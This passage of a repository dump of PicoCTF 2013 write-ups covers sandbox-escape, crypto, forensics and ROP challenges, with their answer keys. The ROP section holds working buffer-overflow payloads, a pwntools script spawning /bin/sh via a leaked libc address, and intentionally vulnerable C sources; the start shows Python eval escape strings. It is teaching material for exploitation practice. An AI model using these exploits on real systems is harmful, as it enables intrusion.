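    print(score_guess(parse_guess("3,1,5,9,2"), code))
    for payload in ("int(flag)", "x.__class__.__base__", "__import__('os')"):
        try:
            parse_number(payload)
        except ValueError as exc:
            print("rejected:", exc)
```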

Finally, using our shell gives us the answer:
```
ls
flag_for_masters
run.sh
task5.py
cat flag_for_masters
you_are_the_pyeval_master
```

**Answer:** you_are_the_pyeval_master

## Other write-ups and resources

* [http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-5.html](http://hacktracking.blogspot.com/2014/02/picoctf-2k13-python-eval-5.html)
* [http://haeresy.tumblr.com/post/49832621763/python-eval-5](http://haeresy.tumblr.com/post/49832621763/python-eval-5)

--------------------------------------------------------------------------------
/pico-ctf-2013/read-the-manual/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Read the Manual

**Category:** Crypto
**Points:** 30
**Description:**

> On the back of the broken panel you see a recovery [manual](tmp2xfLwN.txt). You need to find the emergency repair key in order to put the robot into `autoboot` mode, but it appears to be ciphered using a Caesar cipher.

## Write-up

Quote: "*but it appears to be ciphered using a Caesar cipher*"

We'll use the tool [Decrypt CAESAR Online](http://www.xarg.org/tools/caesar-cipher).

With k = 10, the cleartext is:

```
Instruction manual for Toaster Model 0X653F IMPORTANT: To enter automatic recovery mode,
enter the following recovery key 'tamwxxgkqzac' Boolean logic and IPv0,[...]
```

**Answer:** tamwxxgkqzac

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/robomunication/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Robomunication

**Category:** Cryptography
**Points:** 80
**Description:**

> We recorded the following [communication](https://2013.picoctf.com/problems/robo.mp3) between two robots. Find out what evil things they are plotting, and recover their secret key!
>
> [Offline file](robo.mp3)

## Write-up

This challenge involves transcribing and decoding Morse code.

Listening to the supplied mp3 we can hear the robots speaking in "beep"s and "boop"s. Transcribing those beeps and boops and decoding them using a [Morse code chart](https://upload.wikimedia.org/wikipedia/commons/b/b5/International_Morse_Code.svg) gives us our answer.

**Answer:** BOOPBEEP

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/robomunication/robo.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/robomunication/robo.mp3
--------------------------------------------------------------------------------
/pico-ctf-2013/rop-1/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: ROP 1

**Category:** Binary Exploitation
**Points:** 95
**Description:**

> ROP is a classic technique for getting around address randomization and
> non-executable memory. This sequence will teach you the basics.
>
> Problem available on the shell machine in /problems/ROP_1_fa6168f4d8eba0eb ,
> downloadable [here](https://2013.picoctf.com/problems/rop1-fa6168f4d8eba0eb) with source [here](https://2013.picoctf.com/problems/rop1-fa6168f4d8eba0eb.c).
>
>

## Write-up
Looking at the C code, there are two interesting functions:
```C
int not_called() {
    return system("/bin/bash");
}

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
```
As you may have guessed, the vulnerability is in `vulnerable_function()`.
The function calls `read()` with a size of 256, whereas the buffer only has 128
bytes to fill. This is what is referred to as a buffer overflow, and we're
going to use it to get a shell.

The main difference between the overflow problems and ROP is that ROP-type
problems have NX/ASLR enabled, and sometimes other protections. This means that
libc and stack addresses are random, and that no memory is simultaneously
writeable and executable. RIP shellcode.

Luckily, `not_called()` does most of the heavy lifting for us. Since
ASLR **does not** randomize the addresses in the executable itself (it is not
position-independent), we can reliably supply the address of `not_called()` and
get a shell!

Some quick scratchwork shows that $eip is under our control after 140 bytes
have been supplied:

```
python -c 'print "A"*140 + "BBBB"' | strace ./rop1-fa6168f4d8eba0eb
...
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
```

Now, instead of "BBBB" we're going to try something more useful. We need the
address of `not_called()`. We can run:
`objdump -d rop1-fa6168f4d8eba0eb | grep "not_called"`
which yields `080484a4 <not_called>:`
The address is `0x080484a4`! However, we have to convert that address into an
escape sequence and to little endian. Thus:
```
python -c 'print "A"*140 + "\xa4\x84\x04\x08"' | ./rop1-fa6168f4d8eba0eb
```
should work.

However, as indicated in the SMALL_HINT file given to us, the shell will exit right
away because its standard input is already closed. Finally:
```
(python -c 'print "A"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1-fa6168f4d8eba0eb
```
will get you a shell!

**Note:** This was solved locally on my machine. When using the PicoCTF shell,
the name of the binary is simply "rop1". The final command would change to:
```
(python -c 'print "A"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
```

pwn.

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/rop-1/SMALL_HINT:
--------------------------------------------------------------------------------
Hint: It is really important not to close standard in: a common trick is to do

    echo -ne "my_exploit_string" > ~/some_random_file
    cat ~/some_random_file /dev/stdin | ./rop1

Alternatively,

    cat <(python -c 'print "my_exploit_string"') - | ./rop1

Otherwise, you will launch a shell, but standard in will be closed, so it'll
just exit immediately, which is not much use at all!

Good luck!
14 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/rop1-fa6168f4d8eba0eb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-1/rop1-fa6168f4d8eba0eb -------------------------------------------------------------------------------- /pico-ctf-2013/rop-1/rop1.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | int not_called() { 7 | return system("/bin/bash"); 8 | } 9 | 10 | void vulnerable_function() { 11 | char buf[128]; 12 | read(STDIN_FILENO, buf, 256); 13 | } 14 | 15 | void be_nice_to_people() { 16 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 17 | // sure we don't drop privs if we exec bash, (ie if we call system()). 18 | gid_t gid = getegid(); 19 | setresgid(gid, gid, gid); 20 | } 21 | 22 | int main(int argc, char** argv) { 23 | be_nice_to_people(); 24 | vulnerable_function(); 25 | write(STDOUT_FILENO, "Hello, World\n", 13); 26 | } 27 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d -------------------------------------------------------------------------------- /pico-ctf-2013/rop-2/rop2-20f65dd0bcbe267d.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | char * not_used = "/bin/bash"; 7 | 8 | int not_called() { 9 | return system("/bin/date"); 10 | } 11 | 12 | void vulnerable_function() { 13 | char buf[128]; 14 | read(STDIN_FILENO, buf, 
256); 15 | } 16 | 17 | void be_nice_to_people() { 18 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 19 | // sure we don't drop privs if we exec bash, (ie if we call system()). 20 | gid_t gid = getegid(); 21 | setresgid(gid, gid, gid); 22 | } 23 | 24 | int main(int argc, char** argv) { 25 | be_nice_to_people(); 26 | vulnerable_function(); 27 | write(STDOUT_FILENO, "Hello, World\n", 13); 28 | } 29 | 30 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26 -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/rop3-7f3312fe43c46d26.c: -------------------------------------------------------------------------------- 1 | #undef _FORTIFY_SOURCE 2 | #include 3 | #include 4 | #include 5 | 6 | void vulnerable_function() { 7 | char buf[128]; 8 | read(STDIN_FILENO, buf,256); 9 | } 10 | 11 | void be_nice_to_people() { 12 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 13 | // sure we don't drop privs if we exec bash, (ie if we call system()). 
14 | gid_t gid = getegid(); 15 | setresgid(gid, gid, gid); 16 | } 17 | 18 | int main(int argc, char** argv) { 19 | be_nice_to_people(); 20 | vulnerable_function(); 21 | write(STDOUT_FILENO, "Hello, World\n", 13); 22 | } 23 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-3/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | context(arch='i386', os='linux') 3 | #conventions for pwntools ^ 4 | 5 | first_part = ("A"*140 + "\xa0\x83\x04\x08" + "\x74\x84\x04\x08" 6 | + "\x01\x00\x00\x00" + "\x00\xa0\x04\x08" + "\x04\x00\x00\x00" ) 7 | # our exploit so far ^ 8 | r = process("./rop3-7f3312fe43c46d26", shell=True) #executes the binary 9 | r.sendline(first_part ) #feeds the exploit to the binary 10 | a=unpack(r.recv(4)) #gets the four bytes we leaked from the GOT 11 | print hex(a) 12 | system_address=a-0x9aa40 13 | binsh_address = a+0x85e54 14 | 15 | r.sendline("A"*140+pack(system_address)+"JUNK"+pack(binsh_address)) 16 | """ The above line sends 140 bytes of padding, the little endian form of 17 | system_address, a bogus return address, and the little endian form of the 18 | address of /bin/sh. 
The pack function just turns the integer into an escape 19 | sequence for us 20 | """ 21 | r.interactive() # This just enables you to type things into your shell :) 22 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/SMALL_HINT: -------------------------------------------------------------------------------- 1 | oops, we messed up and use strcpy instead of strcat - but it's still solvable 2 | -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/rop4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rop-4/rop4 -------------------------------------------------------------------------------- /pico-ctf-2013/rop-4/rop4.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char exec_string[20]; 6 | 7 | void exec_the_string() { 8 | execlp(exec_string, exec_string, NULL); 9 | } 10 | 11 | void call_me_with_cafebabe(int cafebabe) { 12 | if (cafebabe == 0xcafebabe) { 13 | strcpy(exec_string, "/sh"); 14 | } 15 | } 16 | 17 | void call_me_with_two_args(int deadbeef, int cafebabe) { 18 | if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) { 19 | strcpy(exec_string, "/bin"); 20 | } 21 | } 22 | 23 | void vulnerable_function() { 24 | char buf[128]; 25 | read(STDIN_FILENO, buf, 512); 26 | } 27 | 28 | void be_nice_to_people() { 29 | // /bin/sh is usually symlinked to bash, which usually drops privs. Make 30 | // sure we don't drop privs if we exec bash, (ie if we call system()). 
31 | gid_t gid = getegid(); 32 | setresgid(gid, gid, gid); 33 | } 34 | 35 | int main(int argc, char** argv) { 36 | exec_string[0] = '\0'; 37 | be_nice_to_people(); 38 | vulnerable_function(); 39 | } 40 | -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: RSA 2 | 3 | **Category:** Crypto 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Math is cool! Use the RSA algorithm to decode the secret message, c, p, q, and e are parameters for the RSA algorithm. [Problem](https://2013.picoctf.com/problems/rsa.txt) 8 | > 9 | > [offline file](rsa.txt) 10 | 11 | ## Write-up 12 | 13 | What is RSA algorithm? [Wikipedia](http://en.wikipedia.org/wiki/RSA_(cryptosystem)) 14 | 15 | We will focus to "Key generation": 16 | 17 | **1. Choose two distinct prime numbers p and q.** 18 | 19 | * For security purposes, the integers p and q should be chosen at random, and should be of similar bit-length. Prime integers can be efficiently found using a primality test. 20 | 21 | **2. Compute n = pq.** 22 | 23 | * n is used as the modulus for both the public and private keys. Its length, usually expressed in bits, is the key length. 24 | 25 | **3. Compute `φ(n) = φ(p)φ(q) = (p − 1)(q − 1) = n - (p + q -1)`, where φ is Euler's totient function.** 26 | 27 | **4. Choose an integer e such that 1 < e < φ(n) and gcd(e, φ(n)) = 1; i.e., e and φ(n) are coprime.** 28 | 29 | * e is released as the public key exponent. 30 | * e having a short bit-length and small Hamming weight results in more efficient encryption – most commonly 216 + 1 = 65,537. However, much smaller values of e (such as 3) have been shown to be less secure in some settings. 31 | 32 | **5. 
Determine d as d ≡ e−1 (mod φ(n)); i.e., d is the multiplicative inverse of e (modulo φ(n)).** 33 | 34 | * This is more clearly stated as: solve for d given `d*e ≡ 1 (mod φ(n))` 35 | * This is often computed using the extended Euclidean algorithm. Using the pseudocode in the Modular integers section, inputs a and n correspond to e and φ(n), respectively. 36 | * d is kept as the private key exponent. 37 | 38 | Use module gmpy2 in python2: 39 | 40 | ```python 41 | import gmpy2 42 | 43 | [...] 44 | 45 | invert(x, m) 46 | # invert(x, m) returns y such that x * y == 1 modulo m, or 0 if no such y exists. 47 | 48 | [...] 49 | ``` 50 | 51 | Install [gmpy2](https://code.google.com/p/gmpy/downloads/list) is required. 52 | 53 | Code: 54 | 55 | ```python 56 | #!/usr/bin/python2 57 | import gmpy2 58 | 59 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 60 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 61 | e = 65537 62 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 63 | t = (p-1)*(q-1) 64 | n = p*q 65 | 66 | # returns d such that e * d == 1 modulo t, or 0 if no such y exists. 67 | d = gmpy2.invert(e,t) 68 | 69 | # Decryption 70 | m = pow(c,d,n) 71 | print "Solved ! 
m = %d" % m 72 | ``` 73 | 74 | **Answer:** 5577446633554466577768879988 75 | 76 | ## Other write-ups and resources 77 | 78 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/rsa.txt: -------------------------------------------------------------------------------- 1 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 2 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 3 | e = 65537 4 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 5 | 6 | Use RSA to find the secret message 7 | -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | import gmpy2 3 | 4 | p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483 5 | q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407 6 | e = 65537 7 | c = 83208298995174604174773590298203639360540024871256126892889661345742403314929861939100492666605647316646576486526217457006376842280869728581726746401583705899941768214138742259689334840735633553053887641847651173776251820293087212885670180367406807406765923638973161375817392737747832762751690104423869019034 8 | t = (p-1)*(q-1) 9 | n = p*q 10 | 11 | # returns d such that e * d == 1 
modulo t, or 0 if no such y exists. 12 | d = gmpy2.invert(e,t) 13 | 14 | # Decryption 15 | m = pow(c,d,n) 16 | print "Solved ! m = %d" % m -------------------------------------------------------------------------------- /pico-ctf-2013/rsa/solve2.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/rsa/solve2.sh -------------------------------------------------------------------------------- /pico-ctf-2013/second-contact/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Second Contact 2 | 3 | **Category:** Forensic 4 | **Points:** 85 5 | **Description:** 6 | 7 | > As you're bumming around the Kuiper Belt, you catch an [incoming transmission](https://2013.picoctf.com/problems/kuiper.pcap) from a distant source. They seem to be scanning the area, looking for something... Maybe you should try to find it first. 8 | > 9 | > This trace file is also available in cloudshark [here](http://www.cloudshark.org/captures/f0741cdfee53) 10 | > 11 | > [Offline file](kuiper.pcap) 12 | 13 | ## Write-up 14 | 15 | Open file with Wireshark. 16 | 17 | Quote: *They seem to be scanning the area, looking for something...* 18 | 19 | We will focus to search engine (Google, Bing, etc). 20 | 21 | When Follow TCP Stream, we see `packet 1018`: 22 | 23 | ``` 24 | http://www.bing.com/search?q=smashing+the+stack+for+fun+and+profit&form=MOZSBR&pc=MOZI 25 | ``` 26 | 27 | They were looking for something that involved to "smashing+the+stack+for+fun+and+profit" 28 | 29 | This is a magazine,the first things that we things is author, contents, ... 30 | 31 | Suprising, flag is the name of author of magazine. 
32 | 33 | **Answer:** Aleph One 34 | 35 | ## Other write-ups and resources 36 | 37 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/second-contact/kuiper.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/second-contact/kuiper.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Spaceport Map 2 | 3 | **Category:** Trivival 4 | **Points:** 55 5 | **Description:** 6 | 7 | > The map of the spaceport is hard to parse, but you're pretty sure there is some hidden information, somewhere... 8 | > 9 | > ![](spaceportmap.gif) 10 | 11 | ## Write-up 12 | 13 | spaceportmap.gif is a animated image (will include some other frames). 14 | 15 | Use [Jeffrey's Exif Viewer Tool](http://regex.info/exif.cgi) to extract all frames of it. 16 | 17 | ![](info.png) 18 | 19 | We can see Animated frame #4: 20 | 21 | ![frame #4](frame4.gif) 22 | 23 | ``` 24 | Key: Do passports let you fly interstellar? 
25 | ``` 26 | 27 | **Answer:** Do passports let you fly interstellar 28 | 29 | ## Other write-ups and resources 30 | 31 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/frame4.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/frame4.gif -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/info.png -------------------------------------------------------------------------------- /pico-ctf-2013/spaceport-map/spaceportmap.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spaceport-map/spaceportmap.gif -------------------------------------------------------------------------------- /pico-ctf-2013/spamcarver/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Spamcarver 2 | 3 | **Category:** Forensic 4 | **Points:** 70 5 | **Description:** 6 | 7 | > While exploring an alien tomb, you find an ancient jpg of [an ancient can of SPAM](https://2013.picoctf.com/problems/spamcarver.jpg). It seems valueless, but the guardbots really want it back, so perhaps there's something more here than meets the eye. Maybe it's cursed, or hexed, if you will? 8 | > 9 | > [Offline file](spamcarver.jpg) 10 | 11 | ## Write-up 12 | 13 | View file in hex: 14 | 15 | ``` 16 | 00000000 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 ÿØÿà..JFIF...... 
00000010 00 01 00 00 FF FE 00 3B 20 20 20 20 20 20 20 20 ....ÿþ.;

[...]

0000CB80 AB D1 5D 7F DA 93 FE 5F C7 FE 00 1F FF D9 50 4B «Ñ].Ú“þ_Çþ..ÿÙPK
0000CB90 03 04 14 00 02 00 08 00 F4 02 9F 41 D4 50 D9 9C ........ô.ŸAÔPÙœ
0000CBA0 E3 2D 00 00 99 2E 00 00 08 00 1C 00 20 20 20 20 ã-..™.......
0000CBB0 20 20 20 20 55 54 09 00 03 8B 4B E1 50 8C 4B E1 UT...‹KáPŒKá
0000CBC0 50 75 78 0B 00 01 04 E8 03 00 00 04 E8 03 00 00 Pux....è....è...
[...]
```

Look at the file signatures: `FF D8 FF E0 00 10 4A 46 49 46` is a JPEG (JFIF) header, and the `50 4B 03 04` that immediately follows the JPEG end-of-image marker `FF D9` is a PKZIP local file header. Extracting the archive on Windows seems to fail: the file cannot be read, because the member's file name consists only of whitespace. So we extract it on Linux instead.

```
$ unzip spamcarver.jpg

# rename the extracted file (its name is eight spaces) to something readable
$ mv \ \ \ \ \ \ \ \ newfile.new

$ file newfile.new
newfile.new: JPEG image data, JFIF standard 1.01
```

Open newfile.new with an image viewer to see the flag.
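The same carve can be scripted so that the whitespace-only member name is handled instead of tripping up the extractor. This is an added example, not code from the write-up; the JPEG-shaped blob and the eight-space archive member are constructed inline, and `find_appended_zip` / `extract_entries` are this example's own names.

```python
import io
import zipfile

JPEG_SOI = b"\xff\xd8\xff"      # Start Of Image, followed by an APPn marker
JPEG_EOI = b"\xff\xd9"          # End Of Image
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def find_appended_zip(data: bytes) -> int:
    """Offset of a ZIP local file header that directly follows the JPEG
    end-of-image marker (FF D9 50 4B 03 04, as in the hex dump), or -1."""
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG")
    off = data.find(ZIP_LOCAL_HEADER)
    while off != -1:
        if off >= 2 and data[off - 2:off] == JPEG_EOI:
            return off
        off = data.find(ZIP_LOCAL_HEADER, off + 1)
    return -1


def extract_entries(data: bytes):
    """Carve the appended archive and return [(raw_name, safe_name, payload)].
    A name that is only whitespace (the trick in this challenge) is replaced
    by a readable one so the payload can be saved and inspected."""
    off = find_appended_zip(data)
    if off == -1:
        return []
    out = []
    with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
        for n, info in enumerate(zf.infolist()):
            safe = info.filename.strip() or "unnamed_%d" % n
            out.append((info.filename, safe, zf.read(info)))
    return out


def _constructed_sample() -> bytes:
    """Constructed test input: a minimal JFIF header, FF D9, then a ZIP whose
    only member is named with eight spaces and carries an inner JPEG."""
    jpeg = JPEG_SOI + b"\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    jpeg += b"\x00" * 16 + JPEG_EOI
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(" " * 8, b"\xff\xd8\xff\xe0 inner JFIF carrying the flag")
    return jpeg + buf.getvalue()


if __name__ == "__main__":
    for raw, safe, payload in extract_entries(_constructed_sample()):
        print(repr(raw), "->", safe, len(payload), "bytes")
```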

![](newfile.new.jpg)

**Answer:** 7adf6f07e0810003c585a7be97868a90

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/spamcarver/newfile.new.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spamcarver/newfile.new.jpg

--------------------------------------------------------------------------------
/pico-ctf-2013/spamcarver/spamcarver.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/spamcarver/spamcarver.jpg

--------------------------------------------------------------------------------
/pico-ctf-2013/technician-challenge/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Technician Challenge

**Category:** Trivia
**Points:** 30
**Description:**

> The spaceport technician waves to you and you approach him. He tells you that he has noticed you walking around suspiciously. He adds that he knows the door code and is willing to give it to you for answering a small trivia question.
>
> > For what kind of car was the first unlocked iPhone traded?

## Write-up

Searching for `For what kind of car was the first unlocked iPhone traded?` turns up plenty of results.

**Answer:** Nissan 350Z

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/trivial/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Trivial

**Category:** Crypto
**Points:** 45
**Description:**

> An unlocked terminal is displaying the following:
>
> > Encryption complete, ENC(???,T0pS3cre7key) = Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU
>
> You poke around and find this interesting [file](https://2013.picoctf.com/problems/encrypt.py).
>
> [offline file](encrypt.py)

## Write-up

Running encrypt.py prints: "Usage: D:\Downloads\encrypt.py SECRET_KEY PLAINTEXT"

The script ends with:

```python
print "Encryption complete, ENC(%s,%s) = %s"%(plaintext,key,ciphertext)
```

So from the terminal output we know:

* key = "T0pS3cre7key"
* ciphertext = "Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU"

The encryption loop is:

```python
plaintext = sys.argv[2]

ciphertext = ""
for i in range(len(plaintext)):
    rotate_amount = keychars.index(key[i%len(key)])
    if plaintext[i] in alphaL:
        enc_char = ord('a') + (ord(plaintext[i])-ord('a')+rotate_amount)%26
    elif plaintext[i] in alphaU:
        enc_char = ord('A') + (ord(plaintext[i])-ord('A')+rotate_amount)%26
    elif plaintext[i] in num:
        enc_char = ord('0') + (ord(plaintext[i])-ord('0')+rotate_amount)%10
    else:
        enc_char = ord(plaintext[i])
    ciphertext = ciphertext + chr(enc_char)
```

`rotate_amount` is the effective per-character key. Encryption adds it, so decryption subtracts it.
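Carrying that through as a stand-alone script (an added example, not the write-up's code): one routine encrypts with direction +1 and decrypts with -1, using the alphabets exactly as encrypt.py defines them. Those alphabets contain typos (`ln m` swapped, and a `q` where `w` should be), so `w`/`W` never match and pass through unchanged, which is why the recovered text reads "hawe" and "decrypwed". `rotate`, `encrypt` and `decrypt` are this example's own names.

```python
# Alphabets copied verbatim from the challenge's encrypt.py, typos included.
ALPHA_L = "abcdefghijklnmopqrstuvqxyz"   # no 'w' in here
ALPHA_U = "ABCDEFGHIJKLMNOPQRSTUVQXYZ"   # no 'W' in here
NUM = "0123456789"
KEYCHARS = NUM + ALPHA_L + ALPHA_U       # position of a key char = rotate amount


def rotate(text: str, key: str, direction: int) -> str:
    """direction=+1 reproduces encrypt.py; direction=-1 is the write-up's decryptor.
    Letters rotate mod 26 within their case, digits mod 10; anything that is not
    in the (typo'd) alphabets is copied through untouched."""
    if not key.isalnum():
        raise ValueError("key may only contain alphanumeric characters")
    out = []
    for i, ch in enumerate(text):
        amount = direction * KEYCHARS.index(key[i % len(key)])
        if ch in ALPHA_L:
            out.append(chr(ord("a") + (ord(ch) - ord("a") + amount) % 26))
        elif ch in ALPHA_U:
            out.append(chr(ord("A") + (ord(ch) - ord("A") + amount) % 26))
        elif ch in NUM:
            out.append(chr(ord("0") + (ord(ch) - ord("0") + amount) % 10))
        else:
            out.append(ch)   # space, punctuation, underscore, and the missing w/W
    return "".join(out)


def encrypt(plaintext: str, key: str) -> str:
    return rotate(plaintext, key, +1)


def decrypt(ciphertext: str, key: str) -> str:
    return rotate(ciphertext, key, -1)


# Values taken from the challenge description.
KEY = "T0pS3cre7key"
CIPHERTEXT = "Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU"

if __name__ == "__main__":
    print(decrypt(CIPHERTEXT, KEY))
```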

A small change turns it into a decryptor:

```python
plaintext = sys.argv[2]

ciphertext = ""
for i in range(len(plaintext)):
    rotate_amount = keychars.index(key[i%len(key)])
    if plaintext[i] in alphaL:
        enc_char = ord('a') + (ord(plaintext[i])-ord('a')-rotate_amount)%26
    elif plaintext[i] in alphaU:
        enc_char = ord('A') + (ord(plaintext[i])-ord('A')-rotate_amount)%26
    elif plaintext[i] in num:
        enc_char = ord('0') + (ord(plaintext[i])-ord('0')-rotate_amount)%10
    else:
        enc_char = ord(plaintext[i])
    ciphertext = ciphertext + chr(enc_char)
```

Now pass the ciphertext in place of the plaintext: "Usage: D:\Downloads\encrypt.py SECRET_KEY CIPHERTEXT"

```
[...]You hawe successfully decrypwed the message! The key is th4ts_w0rs3_th4n_DES
```

**Answer:** th4ts_w0rs3_th4n_DES

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/pico-ctf-2013/trivial/encrypt.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Python 2 challenge file, kept as distributed.
import sys

alphaL = "abcdefghijklnmopqrstuvqxyz"
alphaU = "ABCDEFGHIJKLMNOPQRSTUVQXYZ"
num = "0123456789"
keychars = num+alphaL+alphaU

if len(sys.argv) != 3:
    print "Usage: %s SECRET_KEY PLAINTEXT"%(sys.argv[0])
    sys.exit()

key = sys.argv[1]
if not key.isalnum():
    print "Your key is invalid, it may only be alphanumeric characters"
    sys.exit()

plaintext = sys.argv[2]

ciphertext = ""
for i in range(len(plaintext)):
    # the key character's position in keychars is the shift for this position
    rotate_amount = keychars.index(key[i%len(key)])
    if plaintext[i] in alphaL:
        enc_char = ord('a') + (ord(plaintext[i])-ord('a')+rotate_amount)%26
    elif plaintext[i] in alphaU:
        enc_char = ord('A') + (ord(plaintext[i])-ord('A')+rotate_amount)%26
    elif plaintext[i] in num:
        enc_char = ord('0') + (ord(plaintext[i])-ord('0')+rotate_amount)%10
    else:
        enc_char = ord(plaintext[i])
    ciphertext = ciphertext + chr(enc_char)

print "Encryption complete, ENC(%s,%s) = %s"%(plaintext,key,ciphertext)

--------------------------------------------------------------------------------
/pico-ctf-2013/try-them-all/README.md:
--------------------------------------------------------------------------------
# PicoCTF 2013: Try Them All!

**Category:** Crypto
**Points:** 45
**Description:**

> You have found a passwd file containing salted passwords. An unprotected configuration file has revealed a salt of 5948. The hashed password for the 'admin' user appears to be 02ed2bf40532f187ec9334ef37f75591, try to brute force this password.

## Write-up

Hint: There are [MD5 implementations](http://userpages.umbc.edu/~mabzug1/cs/md5/md5.html) for every major programming language. If you don't know what a [salt](http://en.wikipedia.org/wiki/Salt_%28cryptography%29) is, don't worry, it's just a string appended to the password.

Quote: "*it's just a string appended to the password*"

